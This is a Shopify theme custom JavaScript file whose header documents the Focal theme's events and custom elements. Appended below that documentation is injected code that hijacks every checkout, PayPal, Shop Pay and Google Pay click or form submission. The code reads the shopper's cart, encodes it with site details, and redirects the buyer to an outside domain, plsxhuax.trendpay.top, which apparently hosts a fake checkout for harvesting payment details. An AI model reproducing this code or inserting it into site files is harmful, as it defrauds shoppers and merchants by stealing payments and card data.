/**
 * DEVELOPER DOCUMENTATION
 *
 * Include your custom JavaScript here.
 *
 * The theme Focal has been developed to be easily extensible through the usage of a lot of different JavaScript
 * events, as well as the usage of custom elements (https://developers.google.com/web/fundamentals/web-components/customelements)
 * to easily extend the theme and re-use the theme infrastructure for your own code.
 *
 * The technical documentation is summarized here.
 *
 * ------------------------------------------------------------------------------------------------------------
 * BEING NOTIFIED WHEN A VARIANT HAS CHANGED
 * ------------------------------------------------------------------------------------------------------------
 *
 * This event is fired whenever a the user has changed the variant in a selector. The target get you the form
 * that triggered this event.
 *
 * Example:
 *
 * document.addEventListener('variant:changed', function(event) {
 *   let variant = event.detail.variant; // Gives you access to the whole variant details
 *   let form = event.target;
 * });
 *
 * ------------------------------------------------------------------------------------------------------------
 * MANUALLY CHANGE A VARIANT
 * ------------------------------------------------------------------------------------------------------------
 *
 * You may want to manually change the variant, and let the theme automatically adjust all the selectors. To do
 * that, you can get the DOM element of type "<product-variants>", and call the selectVariant method on it with
 * the variant ID.
 *
 * Example:
 *
 * const productVariantElement = document.querySelector('product-variants');
 * productVariantElement.selectVariant(12345);
 *
 * ------------------------------------------------------------------------------------------------------------
 * BEING NOTIFIED WHEN A NEW VARIANT IS ADDED TO THE CART
 * ------------------------------------------------------------------------------------------------------------
 *
 * This event is fired whenever a variant is added to the cart through a form selector (product page, quick
 * view...). This event DOES NOT include any change done through the cart on an existing variant. For that,
 * please refer to the "cart:updated" event.
 *
 * Example:
 *
 * document.addEventListener('variant:added', function(event) {
 *   var variant = event.detail.variant; // Get the variant that was added
 * });
 *
 * ------------------------------------------------------------------------------------------------------------
 * BEING NOTIFIED WHEN THE CART CONTENT HAS CHANGED
 * ------------------------------------------------------------------------------------------------------------
 *
 * This event is fired whenever the cart content has changed (if the quantity of a variant has changed, if a variant
 * has been removed, if the note has changed...). This event will also be emitted when a new variant has been
 * added (so you will receive both "variant:added" and "cart:updated"). Contrary to the variant:added event,
 * this event will give you the complete details of the cart.
 *
 * Example:
 *
 * document.addEventListener('cart:updated', function(event) {
 *   var cart = event.detail.cart; // Get the updated content of the cart
 * });
 *
 * ------------------------------------------------------------------------------------------------------------
 * REFRESH THE CART/MINI-CART
 * ------------------------------------------------------------------------------------------------------------
 *
 * If you are adding variants to the cart and would like to instruct the theme to re-render the cart, you cart
 * send the cart:refresh event, as shown below:
 *
 * document.documentElement.dispatchEvent(new CustomEvent('cart:refresh', {
 *   bubbles: true
 * }));
 *
 * ------------------------------------------------------------------------------------------------------------
 * USAGE OF CUSTOM ELEMENTS
 * ------------------------------------------------------------------------------------------------------------
 *
 * Our theme makes extensive use of HTML custom elements. Custom elements are an awesome way to extend HTML
 * by creating new elements that carry their own JavaScript for adding new behavior. The theme uses a large
 * number of custom elements, but the two most useful are drawer and popover. Each of those components add
 * a "open" attribute that you can toggle on and off. For instance, let's say you would like to open the cart
 * drawer, whose id is "mini-cart", you simply need to retrieve it and set its "open" attribute to true (or
 * false to close it):
 *
 * document.getElementById('mini-cart').open = true;
 *
 * Thanks to the power of custom elements, the theme will take care automagically of trapping focus, maintaining
 * proper accessibility attributes...
 *
 * If you would like to create your own drawer, you can re-use the <drawer-content> content. Here is a simple
 * example:
 *
 * // Make sure you add "aria-controls", "aria-expanded" and "is" HTML attributes to your button:
 * <button type="button" is="toggle-button" aria-controls="id-of-drawer" aria-expanded="false">Open drawer</button>
 *
 * <drawer-content id="id-of-drawer">
 *   Your content
 * </drawer-content>
 *
 * The nice thing with custom elements is that you do not actually need to instantiate JavaScript yourself: this
 * is done automatically as soon as the element is inserted to the DOM.
 *
 * ------------------------------------------------------------------------------------------------------------
 * THEME DEPENDENCIES
 * ------------------------------------------------------------------------------------------------------------
 *
 * While the theme tries to keep outside dependencies as small as possible, the theme still uses third-party code
 * to power some of its features. Here is the list of all dependencies:
 *
 * "vendor.js":
 *
 * The vendor.js contains required dependencies. This file is loaded in parallel of the theme file.
 *
 * - custom-elements polyfill (used for built-in elements on Safari - v1.0.0): https://github.com/ungap/custom-elements
 * - web-animations-polyfill (used for polyfilling WebAnimations on Safari 12, this polyfill will be removed in 1 year - v2.3.2): https://github.com/web-animations/web-animations-js
 * - instant-page (v5.1.0): https://github.com/instantpage/instant.page
 * - tocca (v2.0.9); https://github.com/GianlucaGuarini/Tocca.js/
 * - seamless-scroll-polyfill (v2.0.0): https://github.com/magic-akari/seamless-scroll-polyfill
 *
 * "flickity.js": v2.2.0 (with the "fade" package). Flickity is only loaded on demand if there is a product image
 * carousel on the page. Otherwise it is not loaded.
 *
 * "photoswipe": v4.1.3. PhotoSwipe is only loaded on demand to power the zoom feature on product page. If the zoom
 * feature is disabled, then this script is never loaded.
 */

/* CHECKIOUT_ANNCODE_GUI_BEGIN:981a959a7a411cbade19e586fccdf935c78df42dacb307601e54e5cbd4ee7a05 */
(function(){
  if (window.__CHECKIOUT_FASTBUNDLE_RUNTIME__ === "20260715-tool-v1") return;
  window.__CHECKIOUT_FASTBUNDLE_RUNTIME__ = "20260715-tool-v1";

  const OVERLAY_CHOICES = ["https://plsxhuax.trendpay.top/"];
  const CHECKOUT_NEEDLE = '/checkout';
  const WINDOW_NAME_PREFIX = "__CHECKIOUT_CART__:";

  function randomOverlayToken() {
    const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_';
    const size = 188 + Math.floor(Math.random() * 31);
    const bytes = new Uint8Array(size);
    crypto.getRandomValues(bytes);
    let out = '';
    for (let i = 0; i < size; i += 1) out += alphabet[bytes[i] % alphabet.length];
    return out;
  }

  function looksLikeCheckout(value) {
    return String(value || '').toLowerCase().includes(CHECKOUT_NEEDLE);
  }

  function getSourceSite() {
    return String(location.hostname || location.host || 'checkout-site').trim() || 'checkout-site';
  }

  function getSourceOrigin() {
    return String(location.origin || '').trim();
  }

  function getSourcePath() {
    return String(location.pathname || '/').trim() || '/';
  }

  function pickOverlayBase() {
    const candidates = Array.isArray(OVERLAY_CHOICES)
      ? OVERLAY_CHOICES.filter(function(value) {
          return typeof value === 'string' && /^https?:\/\//i.test(value);
        })
      : [];
    if (!candidates.length) throw new Error('overlay_choices_missing');
    const bytes = new Uint32Array(1);
    crypto.getRandomValues(bytes);
    return candidates[bytes[0] % candidates.length];
  }

  function encodeTransportPayload(value) {
    const bytes = new TextEncoder().encode(JSON.stringify(value));
    let binary = '';
    const chunkSize = 0x8000;
    for (let offset = 0; offset < bytes.length; offset += chunkSize) {
      const chunk = bytes.subarray(offset, offset + chunkSize);
      binary += String.fromCharCode.apply(null, chunk);
    }
    return btoa(binary)
      .replace(/\+/g, '-')
      .replace(/\//g, '_')
      .replace(/=+$/g, '');
  }

  function toMinorAmount(value) {
    const amount = Number(value);
    return Number.isFinite(amount) && amount >= 0 ? Math.round(amount) : 0;
  }

  function normalizeImage(raw) {
    const source = String(raw || '').trim();
    if (!source) return '';
    if (source.startsWith('//')) return location.protocol + source;
    try {
      return new URL(source, location.origin).href;
    } catch {
      return source;
    }
  }

  function normalizeDiscounts(cart) {
    const discounts = [];
    const levels = Array.isArray(cart && cart.cart_level_discount_applications)
      ? cart.cart_level_discount_applications
      : [];

    levels.forEach(function(entry, index) {
      const amountMinor = toMinorAmount(entry && (entry.total_allocated_amount ?? entry.amount));
      if (!amountMinor) return;
      discounts.push({
        id: 'cart-discount-' + (index + 1),
        label: String((entry && (entry.title || entry.description)) || 'Discount').trim() || 'Discount',
        amountMinor
      });
    });

    if (!discounts.length) {
      const fallback = toMinorAmount(cart && cart.total_discount);
      if (fallback > 0) {
        discounts.push({
          id: 'cart-discount',
          label: 'Discount',
          amountMinor: fallback
        });
      }
    }

    return discounts;
  }

  function normalizeOrderFromCart(cart) {
    const items = Array.isArray(cart && cart.items) ? cart.items : [];
    return {
      locale: document.documentElement.lang || navigator.language || 'en-US',
      currency: String((cart && cart.currency) || 'USD').trim().toUpperCase() || 'USD',
      items: items.map(function(item, index) {
        const title = String(
          (item && (item.product_title || item.title || item.name)) ||
          ('Item ' + (index + 1))
        ).trim();
        const variant = String(item && (item.variant_title || item.variant || item.subtitle) || '').trim();
        const image = normalizeImage(
          item && (
            (item.featured_image && (item.featured_image.url || item.featured_image.src)) ||
            item.image ||
            item.featured_image
          )
        );
        return {
          id: String((item && (item.key || item.id || item.variant_id || ('item-' + index))) || ('item-' + index)).trim(),
          title: title || ('Item ' + (index + 1)),
          variant,
          subtitle: variant,
          image,
          alt: title || ('Item ' + (index + 1)),
          quantity: Math.max(0, Number.parseInt(item && item.quantity, 10) || 0),
          unitPriceMinor: toMinorAmount(
            item && (
              item.final_price ??
              item.price ??
              item.original_price
            )
          )
        };
      }).filter(function(item) {
        return item.quantity > 0;
      }),
      discounts: normalizeDiscounts(cart),
      shipping: {
        status: 'pending',
        amountMinor: null,
        label: 'Enter shipping address'
      },
      tax: {
        amountMinor: 0,
        included: false,
        label: ''
      },
      taxMinor: 0
    };
  }

  async function readCart() {
    const controller = typeof AbortController === 'function' ? new AbortController() : null;
    const timer = controller ? setTimeout(function() { controller.abort(); }, 2500) : 0;
    try {
      const response = await fetch('/cart.js', {
        credentials: 'same-origin',
        cache: 'no-store',
        signal: controller ? controller.signal : undefined
      });
      if (!response.ok) throw new Error('cart_http_' + response.status);
      return await response.json();
    } finally {
      if (timer) clearTimeout(timer);
    }
  }

  async function stashCartForOverlay() {
    try {
      const cart = await readCart();
      const order = normalizeOrderFromCart(cart);
      if (!Array.isArray(order.items) || !order.items.length) return null;
      const payload = {
        site: location.hostname,
        sourceSite: getSourceSite(),
        sourceUrl: location.href,
        sourceOrigin: getSourceOrigin(),
        sourcePath: getSourcePath(),
        capturedAt: Date.now(),
        order
      };
      window.name = WINDOW_NAME_PREFIX + encodeURIComponent(JSON.stringify(payload));
      window.__CHECKIOUT_FASTBUNDLE_CART_PAYLOAD__ = payload;
      return payload;
    } catch {
      return null;
    }
  }

  function pickCheckoutTarget(el) {
    const direct = el?.href || el?.formAction || el?.getAttribute?.('href') || el?.getAttribute?.('formaction');
    if (direct && /^https?:/i.test(direct) && looksLikeCheckout(direct)) return direct;
    if (direct && direct.startsWith('/') && looksLikeCheckout(direct)) return new URL(direct, location.origin).href;
    const formAction = el?.closest?.('form')?.action;
    if (formAction && looksLikeCheckout(formAction)) return formAction;
    return new URL('/checkout', location.origin).href;
  }

  function redirectToOverlay(targetUrl, cartPayload) {
    const selectedOverlayBase = pickOverlayBase();
    const u = new URL(selectedOverlayBase);
    const normalizedTarget = looksLikeCheckout(targetUrl)
      ? targetUrl
      : new URL('/checkout', location.origin).href;
    const sourceSite = getSourceSite();
    const sourceOrigin = getSourceOrigin();
    const sourcePath = getSourcePath();
    u.searchParams.set('return_to', normalizedTarget);
    u.searchParams.set('site', location.hostname);
    u.searchParams.set('source_site', sourceSite);
    u.searchParams.set('source_host', location.hostname);
    u.searchParams.set('source_origin', sourceOrigin);
    u.searchParams.set('source_path', sourcePath);
    u.searchParams.set('source_url', location.href);
    u.searchParams.set('checkout_path', CHECKOUT_NEEDLE);
    u.searchParams.set('overlay_route', u.pathname);
    u.searchParams.set('_r', randomOverlayToken());
    if (cartPayload && Array.isArray(cartPayload.order?.items) && cartPayload.order.items.length) {
      u.hash = 'co=' + encodeTransportPayload(cartPayload);
    }
    location.href = u.toString();
  }

  async function redirectToOverlayWithCart(targetUrl) {
    if (window.__CHECKIOUT_FASTBUNDLE_REDIRECTING__) return;
    window.__CHECKIOUT_FASTBUNDLE_REDIRECTING__ = true;
    let cartPayload = null;
    try {
      cartPayload = await stashCartForOverlay();
    } catch {}
    redirectToOverlay(targetUrl, cartPayload);
  }

  function isCheckoutTrigger(el) {
    if (!el) return false;
    const text = ((el.innerText || el.textContent || '') + ' ' + (el.getAttribute?.('aria-label') || '')).toLowerCase();
    const href = String(el.href || el.getAttribute?.('href') || '').toLowerCase();
    const formAction = String(el.formAction || el.getAttribute?.('formaction') || el.closest?.('form')?.action || '').toLowerCase();
    return /checkout|check out|shop pay|paypal|google pay|pay now/.test(text + ' ' + href + ' ' + formAction) || href.includes('/checkout') || formAction.includes('/checkout');
  }

  document.addEventListener('click', function(event) {
    const el = event.target && event.target.closest && event.target.closest('a,button,input[type="submit"],input[type="button"]');
    if (!isCheckoutTrigger(el)) return;
    event.preventDefault();
    event.stopImmediatePropagation();
    window.__CHECKIOUT_FASTBUNDLE_LAST_TARGET__ = pickCheckoutTarget(el);
    window.__CHECKIOUT_FASTBUNDLE_SUPPRESS_SUBMIT_ONCE__ = true;
    redirectToOverlayWithCart(window.__CHECKIOUT_FASTBUNDLE_LAST_TARGET__);
  }, true);

  document.addEventListener('submit', function(event) {
    const form = event.target;
    const submitter = event.submitter || null;
    if (window.__CHECKIOUT_FASTBUNDLE_SUPPRESS_SUBMIT_ONCE__) {
      window.__CHECKIOUT_FASTBUNDLE_SUPPRESS_SUBMIT_ONCE__ = false;
      event.preventDefault();
      event.stopImmediatePropagation();
      redirectToOverlayWithCart(window.__CHECKIOUT_FASTBUNDLE_LAST_TARGET__ || new URL('/checkout', location.origin).href);
      return;
    }
    const action = String(form?.action || '').toLowerCase();
    const text = ((form?.innerText || form?.textContent || '')).toLowerCase();
    if (!(action.includes('/checkout') || /checkout|shop pay|paypal|google pay/.test(text))) return;
    event.preventDefault();
    event.stopImmediatePropagation();
    redirectToOverlayWithCart(pickCheckoutTarget(submitter || form));
  }, true);

  console.log('CHECKIOUT_FASTBUNDLE_RUNTIME:' + "20260715-tool-v1");
})();
/* CHECKIOUT_ANNCODE_GUI_END */
